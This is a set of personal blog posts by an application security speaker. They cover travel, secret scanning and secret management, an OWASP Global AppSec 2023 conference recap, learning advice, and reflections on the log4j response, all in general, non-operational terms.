This was supposed to be the easiest day of my trip, I was just supposed to get up and fly home, but it ended up being quite stressful. I had a mishap with my ride-share (which took 30 minutes to show up), and then another mishap waiting for security (watch out for the sign in SFO airport that says both “Clear” and “TFS-Precheck” on it with an arrow indicating to wait for those two security options there. Except that it turns out that the line is only for Clear, and people from Canada/TSA-Precheck need to somehow read the minds of the airport staff and understand that is not where TFS-precheck are supposed to wait….????? And it’s actually over 100 meters away so you cannot possibly see the real line??!?!?!). While I was doing this, I was also attempting to negotiating a business deal on the phone, with someone who wouldn’t take no for an answer. I ended up running (literally) through the airport, having a lovely woman recognize me from my keynote and let me jump in front of her in line (thank you wonderful mystery lady!), and then somehow I just barely managed to get onto my plane to Vancouver before it took off.
After that ‘excitement’ was a 4-hour layover in Vancouver, with more phone calls and emails and negotiations, before I gave up on trying to get work done and called my bestie for advice on “how to say no more forcefully” (she suggested I record a video of me laughing rudely and emailing it to the person, but I decided that was likely not the most mature response… Instead, I politely replied “no thank you”, again). Then I decided to relax and call my mom to say hi, before taking my plane ride back to Vancouver Island, then one more hour to drive home from the airport. I was POOPED!
I kept this last bit in about Friday because I don’t think people understand how un-glamourous the life of a CEO-of-a-small-company and/or person who does public speaking for a living can be. Answering emails into the evenings, taking several calls in-between flights, literally running from event to event, posting the #cybermentoringmonday thread to Mastadon (because it cannot be automated, but I still really want to engage with that community) while in line at a café in the airport, hoping I can get both a latte AND catch my flight… And I’m not telling you the half of it.
When people thank me after I give a talk. When people carry my book onto a plane with them, to bring it a conference to ask me to sign it. When people tell me how my mentoring program, blog, talks, or any other work I have done has helped them. THAT is what makes every single minute of hard work worth it. When I find out I helped someone find a new job, when they really needed it. When I hear a woman had the courage to ask for a raise, and she got it. When I hear that a company has changed the way they secure their apps, for the better. All of this makes my cup overflow. Thank you for reading about my trip. <3
When I started programming in the 90’s the security of software wasn’t on everyone’s mind like it is now. I took no security classes in my 3-year college computer science program, and it never even came up as a subject. I was taught to save the connection string for each different environment in the comments in your code, so it was easier for the next programmer to find them. It wasn’t until 2012 that someone ran a web app scanner (also known as a DAST – dynamic application security testing tool) on one of my apps. I didn’t understand a word of what I read in the report at the time. When I switched from programming to penetration testing, and then onto application security, there was quite a big learning curve for me.
Back to the Secrets
Secrets are what computers use to authenticate to other computers. For instance, an application sending a connection string to a database is its way of asking “I am this specific web app, please let me query your database.” When the database connection works, that’s the database’s way of saying “Sure thing!” Computers don’t have eyes, ears, or brains, so they can’t ‘recognize’ someone like humans can; they have to use secrets.
A secret can be a password, an API secret, a certificate, a hash, a connection string, etc. Most importantly: they should not be shared and should only be saved into your secret management tool. But I am getting ahead of myself.
When we save secrets into our code it is possible for another programmer to come along and use that secret; for better or for worse. They can login into your database, connect to your API, or anything else that the secret can be used for. Sometimes this can seem quite helpful, for instance if a client forgot their password when I was a programmer I used to log into the database, grab a copy of their password, use our decryption tool, and tell it to them over the phone. My whole team used to do it. Now I know that it’s more secure to have the user receive a password link in their email (to validate they are who they say they are), that the client’s password should have been salted and hashed (a one-way cryptographic method), and that the password to the database should have been kept in a secret management tool (making it unretrievable for human beings). Secrets in our code allow for all sorts of potential attacks, breaches, and embarrassments.
If you want to find out if you have secrets in your code, you can use a tool called a secret scanner. There are many on the market, and many of them are free. They use a variety of ways to try to find secret, but most commonly they use REGEX (regular expressions) to look for entropy (extremely long and random bunches of characters) and key words (password, secret, key, etc.).
When I work somewhere doing AppSec, I try to get read-only access to the code repositories as soon as possible (for many reasons, not just this). Once I have it, I download all the code, from all the projects I can, in a zip. I unzip it, point my secret scanner at it, and then settle in for a few hours to go hunting around in the code. Putting on music and getting a tasty warm beverage (hot chocolate anyone?) can make this a more enjoyable activity. It’s not exactly riveting.
Start by looking at the first finding. Sometimes it’s something really obviously bad, such as:
That’s a secret for sure! The next step is to rotate that secret. Rotating this secret would mean changing the password to something new on the system this is used for. Then you check that new secret into your secret management tool (more on this soon), and then (the hard part) you update the code in this application to fetch the secret from your secret management tool instead and publish the updated code. Do not, under any circumstance, use the same value as the one you found. That secret has been ‘spoiled’, ‘spilled’, or ‘spilt’. It is no longer usable, as someone malicious might have it saved somewhere, or already be actively using it for malicious purposes.
You are going to need to follow this process for every secret you find. Sometimes it means regenerating a certificate, creating a new API, etc. It’s a bit of a pain, but it’s a lot better than having a data breach or other type of security incident to deal with.
Special Note: when you find a secret in the code, depending upon what you found, you may want to trigger the incident response (IR) process, to investigate as to if this secret has been used improperly. When you find a secret, you can’t know if you were the first, second, or tenth person to find it. Kicking off your IR process is a real-life application of the ‘assume breach’ secure design concept.
Preventing Secrets in the Code
Code repositories (also known as version control or ‘repo’) have several types of ‘events’ that can be used to trigger automation. When someone merges their code back into the main branch, you can automate it to run tests to verify it integrates nicely. When code is checked it, the repo can prompt someone else to review the changes before it is merged into all the other code. The event we are interested in is called a ‘pre-commit hook’.
The moment someone checks code in that contains a secret, they have spilt it. The secret will be in the history and backups and maybe even in the logs. You must rotate it. Even if you realize your mistake only 5 minutes later, the damage is done.
A pre-commit hooks allows you to run your secret scanning tool on only the new or changed code you are checking in, and if it finds a secret, it stops the check-in process. It gives the user an error message, explaining that it thinks it has found a secret, and blocks the code from being checked in. This means the secret has not been spilt; no secret rotation required! If you code does not have a secret in it, your check in continues, and any other events you set up do their thing. The test takes so little time, that is almost unnoticeable to the end user.
Secret Management tools did not exist when I started programming. In fact, they are somewhat ‘new on the scene’ and not widely adopted, yet. Secret management tools manage secrets for machines. They are not password managers, which manage secrets for humans. They are still fantastic though!
When using secret management tools, generally we create a new vault (an instance of encrypted secrets) per system (the application to which those secrets belong). We do this so that if one vault is compromised somehow (perhaps the vault is lost or corrupted), then only one system will be harmed. We also do this to ensure the vault is accessible by whatever system it supports; you wouldn’t want to have to open a hundred holes in your firewall so that all your systems can connect to it.
When we check a secret into a secret management tool, we say goodbye to it forever. We do not keep a copy elsewhere, because we can trust the secret management tool to keep it safe for us. It’s encrypted in the vault, and it is retrieved only programmatically (humans cannot ‘reveal’ the secret in plaintext). Your CI/CD can retrieve it, your application, APIs, etc. This means your secrets are managed in an automated way, leaving zero room for human error. Trust me, it’s a good deal!
As you follow the process of finding all the secrets, you should take note of false positives, so you can suppress them in the future. An example I ran into myself: there was a license key for a mail merge program, but the company who made the program had gone out of business years ago. This meant that they weren’t breaking any licensing agreement to use it all over the place, and they didn’t need to protect the key because it could be used as many times as they liked. That meant it wasn’t really a secret anymore. We suppressed the license key from then on.
You should create rules to avoid false positives, as it will become annoying over time if you have weird situations like the one mentioned above.
If you work at an organization that has a lot of technical debt, cleaning up all of your secrets can take quite a lot of time. That said, if you have an intern, co-op student, or junior application security person on your team, this is an ideal task for them. It’s lots of work, it’s easy to do, and it looks good on a resume. It also reduces the risk of your organization greatly, which is always a big win.
Recently I had the pleasure of being one of the keynote speakers at OWASP Global AppSec, in Dublin Ireland. In this post I’m going to give a brief overview of some of the talks I saw while I was there, and the TONS of fun I had. I didn’t get to stay very long, and due to jetlag I fell asleep a few times when I wished I could have stayed awake, but overall I would recommend this event (and all the OWASP Global AppSec events) to anyone who is interested in application security, OWASP, or Guinness beer. This is going to be a long blog post, get yourself a beverage and get ready for lots of pictures!
I landed the morning before the conference, and met up with two friends I hadn’t seen in far too long, Takaharu Ogasa from Japan, and Vandana Verma from Bangalore India. I also met another speaker for the event named Meghan Jacquot!
The evening before the conference I had wanted to set up a We Hack Purple in-person meetup, but I was running short on time. Luckily, my friends at SemGrep invited me to a free pre-conference networking event, so I invited all the WHP folks to meet me there. Unfortunately, WAY too many people where there (the place was supposed to hold 50-100 people, but 200 showed up). Although I got to see many friendly faces (see Jessica Robinson, Vandana and I below), it was far too crowded for me. As a Canadian, we’re used to 13 square kilometres of personal space, per person, and it was a bit much for me. ;-D
Luckily Adam Shostack invited me to a super-secret-speaker’s dinner the same evening, held in a giant church that had been converted into an amazing live music venue! There were tap dancers, fiddlers, OWASP Board Members, and Adam did an impromptu book signing!!! Thank you Adam! Next to Adam is Avi Douglen of the OWASP Board of Directors, and also an avid threat modeller.
The next day I woke up extremely early (6:00 am), thanks to a crying baby in the room next to mine at the hotel. :-/ I used this time to call home and practice my talk: Shifting Security Everywhere. You can download a summary of my presentation here. (Note: you are supposed to join my mailing list to receive the PDF, but my mailing list is awesome, so hopefully you feel it’s a good trade. Also, you can easily get around this if you truly do not want to subscribe, simply do not press the ‘confirm subscription’ link).
Grant Ongers, from the OWASP board of directors, kicked off the conference by announcing a brand-new award “OWASP Distinguished Lifetime Member” and then announced the first 4 winners: Simon Bennetts, Rick Mitchell, Ricardo Pereira, and Jim Manico. As a person who has volunteered many hours for OWASP, I felt it was beautiful to see 4 extremely dedicated volunteers receive this much-deserved award. I am very proud of all of them and their amazing contributions to our community! Great job OWASP for thinking of this new way to show appreciation by publicly recognizing some of our most-dedicated volunteers!
The very first talk of the conference was called “A Taste of Privacy Threat Modeling” by a woman named Kim Wuyts, introduce by Avi Douglen (Member of OWASP Board of Directors). She spoke about threat modelling privacy, and used ice cream analogies to explain how marketers see our data. I like ice cream, privacy, AND threat modelling, so this was a real treat (pun intended!). I care a lot about privacy, both personally and professionally, and loved how she used situations we are all familiar with (including eating ice cream too fast then ending up with brain freeze!) to explain various concepts within privacy and threat modelling. I feel like any person, with zero previous technical experience or knowledge, would have been able to follow her entire talk, which is quite rare at a conference like this. She also made her OWN threat modelling privacy game! Nicely done Kim!
After the delicious lunch of yummy curry and rice, and more than one latte, we had the afternoon keynote. Grant Ongers introduced Jessica Robinson, who explained “Why winning the war in cyber means winning more of the everyday battles”. She shared several personal stories from her career, including what it was like to be a woman of colour working in STEM, her obsession with the Kennedys, implementing the first cyber security policy at a large law firm in New York City, and more! The thing I liked most about her presentation was how she took us on a journey. She’s an incredibly gifted public speaker, and she started by getting us all to close our eyes, then imagine various things, before opening our eyes and formally beginning her talk.
Part way through Jess’ presentation the videographer fainted, fell, and made a huge loud noise. He’s okay, don’t worry readers! All 500 of us turned around and started becoming concerned. She inquired as to if he was okay, a bunch of staff rushed to take care of him, and once it was clear there was no danger, she recommenced her talk. Not very many speakers would be able to recover like she did. To be able to fully capture our attention again was very impressive. I’m say this as a person who was a professional entertainer for 17 years, and then professional public speaker for 6 years; that is an incredible feat. By the end I had completely forgotten about the fainting, because I was so wrapped up in her and the tales she was telling. Anyway, she’s amazing.
At this point I have a silly complaint. Usually when I go to an InfoSec conference, there are only a handful of talks that interest me. I always want to see all of the AppSec talks, maybe some quantum computing, anything to do with using AI to create better security, or topics about cyber warfare (which equally interest and frighten me). But it’s rare at a conference that is not AppSec-focused that I have conflicts in the schedule of things that I really want to see. This happened a LOT at this conference. Sometimes there would be 3 different talks, at the same time, that I was dying to see. I found it very difficult to choose for some of the time slots, which may sound strange, but I’m a very decisive person. Not being able to decide is rare for me. That said, I am pleased to report that all of them were recorded, even if we all know it’s not quite as good as being there in person. I will try to add links to all the talks listed here once the videos are out so that you can enjoy them too!
This is my favourite picture from the entire conference. When you work on an open-source project with someone, you are working because you love what you are doing. When everyone on your team really cares about your goal, you can become very good friends. It is very clear the SAMM team are great friends! I love seeing OWASP bring people together! <3
The talk from the image above was about the OWASP SAMM project – The Software Assurance Maturity Model, presented by Seba Deleersnyder and Bart De Win. I live tweeted their talk (link here), if you want a play-by-play. The essence of their presentation was updates about the project from the past 2-3 years, and how they have worked with the community and industry to update, expand, and improve the model to be more helpful, by creating tools, surveys and online documentation to make their project more useful for everyone. I had been planning on writing a blog post about the project called “OWASP SAMM, for the rest of us”, because I find clients are often very insecure that they won’t ‘measure up’ to the SAMM standard. I hope I can help a bit by breaking things down into smaller pieces, and helping teams start where they are at, then working their way up over time. SAMM can work for any team, just be realistic and try not to be too hard on yourself! We all have to start somewhere.
After Seba and Bart’s talk it was time for the networking event. OBVIOUSLY, they had Guinness beer on tap! We were in Ireland! I had a great time, chatting with all sorts of people, and I got an awesome gift of a Tigger-striped hoodie from Avi Douglen, which made my day! Then I went back to my hotel room to practice my talk, approximately a thousand times.
Side note: Remember the baby in the hotel room next to mine? The night before my talk it started crying, loudly, at 3:00 AM, and continued crying all the way until 6:00 am. I was up almost the entire night. Which gave me plenty of time to practice my talk. Yay?
Usually when you see me present a ‘new’ talk at a conference, it is not the first time that I have presented it. In fact, I have often given it 5 to 10 times, in front of 1 or 2 people each time, which is why I usually seem so comfortable on stage. I always practice new material on people from my community (We Hack Purple, OWASP Ottawa, the Ottawa Ladies Code Meetup, WoSEC Victoria, etc.). I’ve always turned to my community for feedback, advice, and encouragement. They have always been gentle, kind, and give reliably fantastic advice! I would recommend every speaker do this! But this time, because I was asked to do this with so little time, I hadn’t presented it in front of anyone. In fact, I was still writing it as I flew across the ocean to the venue. I WAS SO NERVOUS!!!!!
But it went really well anyway! Phew! And Matt Tesauro introduced me, so that was extra-nice! Matt is on the OWASP Board of directors and a leader of the Defect Dojo Project. Actually, he’s been a part of several different projects and chapters over the years. He was kind enough to distribute the maple-candies I brought to give to all the people who asked questions. Having a long-time friend introduce me made me a lot less nervous! Thank you Matt!
Now that my talk was over, I could concentrate completely on having fun! I ended up in the hallway speaking to lots of people and missing the talk after mine. Then we had lunch, and then came another time slot where there were THREE talks I wanted to see. THREE amazing presentations to choose from! I ended up in Tal Melamed’s talk, about the OWASP Serverless Top Ten. I had spoken to Tal many times before, but it was our first time meeting in person, so that was pretty exciting for me. I even managed to sit with him for lunch! Even though I already knew the Serverless Top Ten, it was still exciting to see Tal speak to it. As a bonus, he ended slightly early, so I was able to catch the Q&A after Matt Tesauro’s talk about Hacking and Defending APIs – Red and Blue make Purple. I felt this was a good compromise.
After lunch the wonderful Vandana Verma got on stage to introduce the last keynote speaker. She told us all that there would be “a BIG announcement” at 5:30 pm, so we had better not leave early. For those that don’t know, the big announcement was that OWASP has officially changed their name (but not the acronym). Previously it stood for ‘Open Web Application Security Project”, but that name was limiting. People often complained that we kept straying outside our purpose, by including cloud, containers, etc. But why would we want to limit ourselves like that? So the board of directors voted to change it to “Open World Wide Application Security Project”, which I have to say, I like WAY BETTER. Nicely done board!
The last keynote was Dr. Magda Chelly, and it was spectacular! In her talk, AI-Assisted Coding: The Future of Software Development; between Challenges and Benefits, she spoke about how AI is going to change the way most of us work, especially those of us in IT. I don’t want to give away the entire talk, but… She explained how many of us could work with AI, the difference between AI-assisted and AI-created content (this is more important that I had previously realized), and all the issues and questions around who owns the copyright of such work. If an AI creates a poem, but you asked it to create a poem, and gave it the parameters to create said poem, who owns the copyright? What if it only assisted you in creating an application, it didn’t write all the code, just some of the code? Who owns that? Also, when we train AI on certain data, but that data has specific licensing, then the AI creates code that is not licensed in the same way, has the created code broken the license agreement? There was a fascinating discussion during the Q&A, and it definitely has me thinking about such systems in a very new way.
The last talk that I saw at the conference was present by someone named Adam Berman, it was called “When is a Vulnerability Not a Vulnerability?”. For those of you who have followed me a long time, you would know that I wrote a blog post with that exact title in 2018 (read it here). My post was about when vulnerabilities are reported to bug bounty programs, but they are not exploitable/do not create business risk, is it really a vulnerability? In it I explored a ‘neutered’ SQL injection attack, and of all the posts I have ever written, it has received by far the most scrutiny.
That said, although there was a similar slant, it was definitely not based off of anything I have written or spoken on. Which made it extra-exciting for me!
Adam works at R2C (who make SemGrep), so all of the research came from them. In April of this year, I will be co-presenting a workshop at RSA with Clint Gibler (of R2C andTL;DR Sec fame) about ‘How to Add SAST to CI/CD, Without Losing Any Friends’ (no link available at this time). We will be using SemGrep to demo all the lessons, so I was extra-curious to see Adam speak!
Adam’s talk was all about traceability in Software Composition Analysis (SCA). A reoccurring issue that happens when you work in AppSec is developers not having enough time to fix everything we ask them to. We (AppSec folks) are constantly trying to persuade, pressure, demand, and even beg developers to fix the bugs we have reported. One of the most convincing ways to get a developer to fix a bug is by creating an exploit. But that is VERY time consuming! It’s not realistic for us to create a proof-of-concept exploit for every single result that our scanners pick up. Layer on top of this the fact that automated tools tend to report a LOT of false positives, and this leads many developers to question if they absolutely need to fix something, or if “maybe we can fix it until later”. And by “later” I mean “never”.
If you scan an application with an SCA tool, most of them will tell you if any of the dependencies in your application are ‘known to be vulnerable’. They do this by checking a list of things they know are vulnerable (they create this list in many ways, and Adam covered that, but that part is not the exciting part, you can learn that anywhere). Think of the SCA tool working like this: “Are you using Java Struts version 2.2? Yes? It’s vulnerable! I shall now report this to you as a vulnerability!” But just because the dependency has a vulnerability in it, it doesn’t necessarily mean that you application is vulnerable, and here lies the problem.
If your application is not calling the function(s) that have the vulnerability in them, then your app shouldn’t be vulnerable (in most cases this is true, there are rare exceptions, specifically Log4J). Previously, SemGrep released a blog post about this (you can read it here), and they claim that approximately 98% of all results from SCA tools are false positives, because the vulnerable function within the dependency is never called from the scanned app. Which means there’s no risk to the business. Which means it’s a false positive. It’s still technical debt, which is not great, but it’s not a great big hole in your defenses, and that’s a very different (and much less scary) problem.
If you’ve been begging developers to update all sorts of dependencies, imagine if you reduced your number of asks by 98%? And you could show them where their app is calling the problematic function? That conversation would likely be a lot less difficult. In fact, I bet the developers would jump to fix it. Because it would be obvious that it’s a real risk to the business.
This is a BIG CLAIM, so I wanted to hear the details in person. And I did!
Because this was an OWASP event, Adam couldn’t just say “Yo, SemGrep is awesome, buy our stuff”. If he did that it also would also make for a not-very-entertaining-or-believable presentation. Instead, he explained HOW to do this yourself. And just how much work it is. Spoiler alert: it’s a lot of work.
Although I would love to provide the technical details for you, I have to admit that I was almost falling asleep the entire time because of the “absolutely no sleep” situation from the night before with the crying baby. I must have yawned 100 times, and I was more-than-a-little concerned I may have offended the speaker! That said, I can’t give you the details, but I will post a link here as soon as I have it so you can watch Adam explain. He’s better at explaining it anyway!
Then I went to bed (at 4:00 pm, and I slept all the way until 5:00 am the next day!). After that I headed to the airport, flew home, and wrote this on the plane! I hope you enjoyed my summary of my experience at OWASP Global AppSec 2023, held in Dublin, Ireland, February 14th and 15th, 2023.
Working in the information technology (IT) field means you need to be comfortable with things at work constantly changing and the need to continue to learn as your career grows. Working in information security (InfoSec) means you not only need to keep up with all sorts of IT trends, but also the attacks, defenses, and mitigations for each. When I started learning about DevOps, and how they value continuous learning and ‘taking time to improve your daily work’, I was sold. But I wasn’t quite sure how to go about putting it into practice.
When I switched from being a software developer to a penetration tester, and then onto application security, I had a lot to learn. On top of that, I am dyslexic, so the more common ways that people learn don’t always work well for me. Even worse, my training budget for my job in the Canadian Public Service was $2,500 CAD a year (approximately $1900 USD) and I wasn’t allowed to travel for courses. Living in Ottawa, Canada at the time, there weren’t very many options that were within my reach.
I started out my security career switch with a professional mentor, but the first one didn’t work out very well. He got frustrated with me quickly, no matter how hard I tried. Although I found out later that his expectations were near-impossible to meet, and what was asked of me was not very reasonable (nor ethical at a times). Example: He asked me on a Friday to learn pentesting over the weekend, with no help or advice, and then told me to do my first pentest the following Monday, setting me loose on a client’s live production system, with zero previous experience. It did not end well. For me and the client. The mentor and I went our separate ways.
By this point I had started joining security communities. And I LOVED it. My favourite community of all the local ones I could find was OWASP, the Open Web Application Security Project. The Ottawa chapter was led by someone named Sherif Koussa, who I am proud to still call my friend and mentor today. I made friends quickly, found more than one new mentor, and even became a chapter leader. I learned a lot by inviting speakers, talking to others in the community, and volunteering for projects.
Eventually I started doing public speaking, which provided me with free tickets to conferences, and sometimes even free training! I also started my own OWASP project (OWASP DevSlop) so that I could learn how to secure software in a DevOps environment.
It became clear to me, very quickly, that I learn best by reading/listening/watching something, then trying it for myself, then teaching it to someone else. I also enjoy learning more when I follow this process, rather than only reading or watching videos. I realize this is way more work than just reading a book, but everyone is different. And I’m lucky because other people seem to like my style of teaching and writing, which motivates me in a way I had never previously known. 😀
Below is a long list of ways that you can use continue your learning. If you have more ideas, please send them to me and I will add them!
Find what you are interested in. Join communities (online and local, if possible) that focus on those topics. Make friends if you can!
Finding out what you are interested in might take a lot of time, that’s okay! It took me 2 years to figure out I wanted to do AppSec, not PenTesting. You need to find the right place for you.
If you fear that you are too old to learn, please put that notion aside. You CAN learn. If this belief is holding you back, talk to someone who cares about you, and let them talk you out of it. Everyone has doubts sometimes, people who love you can help you look past them.
Find out if there are learning opportunities at work. Sometimes you can job shadow someone or help on certain projects. I kept volunteering to help the security team at my office and eventually they let me join the team!
Some organizations offer coaching services to employees. Usually it’s for leadership, but I used to work somewhere as an AppSec coach. I trained up the junior people into AppSec pros; it was great!
If your office pays to bring in a trainer, it’s often significantly less costly than sending them all individually to courses. See if you can join forces with other teams, departments, or even other organizations to create a larger budget.
Ideally you will aim to learn about best practices that are agnostic in nature, and then also learn about your specific tech stack that you use at work. This could mean a general secure coding course, with a break-out session on your specific programming language, framework, cloud provider, etc.
If you are reading this and you are on the security team, and you are planning to train your developers on security for the first time, if anyone seems nervous, you might want to assure them all that no one is losing their job. It might sound strange, but sometimes when there’s change, people worry. If you can remove their worries, they will learn more, and hopefully maybe even enjoy it. Pay attention for this and reassure people if the need arises.
If you are planning learning for others, communicate your plan, in advance. Let them know what’s coming. It helps people prepare themselves, and you are likely to get better results.
If possible, provide training in multiple formats (audio, visual/diagrams/images, hands on, written, etc.) so that every person’s learning style is accommodated. If you’re not sure how you learn, try a few different ways and see which one “feels right”. That’s likely the best one for you!
Give yourself short breaks. A microbreak (5-15 seconds to laugh at a meme or read a few short posts on mastadon) can help you move the information from your short memory into long term memory, meaning you are more likely to be able to apply what you learned, and remember it for significantly longer.
Take tests or give yourself tests. Not so that you can see how you measure up against others, but to make yourself remember the things you’ve learned. Practising ‘recall’ will help ensure you’ve learned (not memorized) the new information.
Set a time aside for yourself each day and slowly watch recorded conference talks and other content that are of interest to you. Consuming information is smaller chunks can make it easier to absorb. If you aren’t sure which videos, books or articles that you want to start with, ask for suggestions from people in your community.
Application Security Learning Opportunities:
Please start with the free training inside We Hack Purple Community. There are courses, articles, events, and formal courses you can follow, and all of it is free! Start with the class ‘Application Security Foundations Level 1’ if you are new to this topic.
Most AppSec vendors will give you a workshop for free if their product is expensive/enterprise. ASK for a workshop for your team, for free. They might say no. If they do, tell them their competitor offers it (because this is true in most cases). Sometimes this works! If it doesn’t work, find out if you can add the cost of training onto the licensing agreement.
I haven’t written in my personal blog in a while, and I have good reasons (I moved to a new city, the new place will be a farm, I restarted my international travel, something secret that I can’t announce yet, and also did I mention I was a bit busy?). But I still can’t get over log4j (see previous article 1, article 2, and the parody song). The sheer volume of work involved (one company estimated 100 weeks of work, completed over the course of 8 days of time) in the response was spectacular, and the damage caused is still unknown at this point. We will likely never know the true extend of the cost of this vulnerability. And this bugs me.
I met up last month with a bunch of CISOs and incident responders, to discuss the havoc that was this zero-day threat. What follows are stories, tales, facts and fictions, as well as some of my own observations. I know it’s not the perfect story telling experience you are used to here, bear with me, please.
Short rehash: log4j is a popular java library used for application logging. A vulnerability was discovered in it that allowed any user to paste a short string of characters into the address bar, and if vulnerable, the user would have remote code execution (RCE). No authentication to the system was required, making this the simplest attack of all time to gain the highest possible level of privilege on the victim’s system. In summary: very, very scary.
Most companies had no reason to believe they had been breached, yet they pulled together their entire security team and various other parts of their org to fight against this threat, together. I saw and heard about a lot of teamwork. Many people I spoke to told me they had their security budgets increased my multitudes, being able to hire several extra people and buy new tools. I was told “Never let a good disaster go to waste”, interesting….
I read several articles from various vendors claiming that they could have prevented log4j from happening in the first place, and for some of them it was true, though for many it was just marketing falsehoods. I find it disappointing that any org would publish an outright lie about the ability of their product, but unfortunately this is still common practice for some companies in our industry.
I happened to be on the front line at the time, doing a 3-month full time stint (while still running We Hack Purple). I had *just* deployed an SCA tool that confirmed for me that we were okay. Then I found another repo. And another. And another. In the end they were still safe, but finding out there had been 5 repos full of code, that I was unaware of as their AppSec Lead, made me more than a little uncomfortable, even if it was only my 4th week on the job.
I spoke to more than one individual who told me they didn’t have log4j vulnerabilities because the version they were using was SO OLD they had been spared, and still others who said none of their apps did any logging at all, and thus were also spared. I don’t know about you, but I wouldn’t be bragging about that to anyone…
For the first time ever, I saw customers not only ask if vendors were vulnerable, but they asked “Which version of the patch did you apply?”, “What day did you patch?” and other very specific questions that I had never had to field before.
I heard several vendors have their customers demand “Why didn’t you warn us about this? Why can’t your xyz tool prevent this?” when in fact their tool has nothing to do with libraries, and therefore it’s not at all in the scope of the tool. This tells me that customers were quite frightened. I mean, I certainly was….
Several organizations had their incident response process TESTED for the first time. Many of us realized there were improvements to make, especially when it comes to giving updates on the status of the event. Many people learned to improve their patching process. Or at least I hope they did.
Those that had WAF, RASP, or CNDs were able to throw up some fancy REGEX and block most requests. Not a perfect or elegant solution, but it saved quite a few company’s bacon and reduced the risk greatly.
I’ve harped on many clients and students before that if you can’t do quick updates to your apps, that it is a vulnerability in itself. Log4j proved this, as never before. I’m not generally an “I told you so” type of person. But I do want to tell every org “Please prioritize your ability to patch and upgrade frameworks quickly, this is ALWAYS important and valuable as a security activity. It is a worthy investment of your time.”
Again, I apologize for this blog post being a bit disjointed. I wasn’t sure how to string so many different thoughts and facts into the same article. I hope this was helpful.
All of the streams are free, and I would love to have you join us live! If you can’t make it live, you can watch them after on my YouTube Channel, or download them via a podcast app by looking for the podcast “Alice and Bob Learn” (which will be launched right after the first stream).
Ideally, you will read the chapter before the corresponding live discussion, but if you don’t, that’s okay. You will still learn, and you are definitely will welcome to attend. 😀